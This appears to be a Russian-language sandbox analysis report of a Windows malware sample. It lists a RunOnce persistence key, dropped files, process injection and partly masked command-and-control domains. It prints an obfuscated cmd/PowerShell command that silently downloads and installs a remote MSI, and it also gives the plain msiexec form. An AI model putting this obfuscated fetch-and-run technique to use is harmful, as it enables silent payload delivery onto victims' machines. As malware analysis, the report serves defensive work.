Техническая информация
Для обеспечения автозапуска и распространения
Модифицирует следующие ключи реестра
- [<HKCU>\Software\Microsoft\Windows\CurrentVersion\RunOnce] 'Startup key' = '%TEMP%\subfolder1\filename1.vbs'
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\cmd.exe' /c powershelL m%ProgramW6432:~15%iexec.exe /q%CommonProgramFiles(x86):~-25,1%/%windir:~-6,1% http://aq#.to/12.msi
Внедряет код в
следующие пользовательские процессы:
- msi8d34.tmp
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\subfolder1\filename1.exe
- %TEMP%\subfolder1\filename1.vbs
Сетевая активность
Подключается к
- 'aq#.to':80
- 'aq#.news':443
- 'r3.#.lencr.org':80
- 'Ch####rymalem.com':2020
TCP
- 'aq#.news':443
- 'Ch####rymalem.com':2020
UDP
- DNS ASK aq#.to
- DNS ASK aq#.news
- DNS ASK r3.#.lencr.org
- DNS ASK Ch####rymalem.com
Другое
Создает и запускает на исполнение
- '%WINDIR%\installer\msi8d34.tmp'
- '<SYSTEM32>\cmd.exe' /c powershelL m%ProgramW6432:~15%iexec.exe /q%CommonProgramFiles(x86):~-25,1%/%windir:~-6,1% http://aq#.to/12.msi' (со скрытым окном)
Запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' msiexec.exe /q /i http://aq#.to/12.msi
- '<SYSTEM32>\msiexec.exe' /q /i http://aq#.to/12.msi
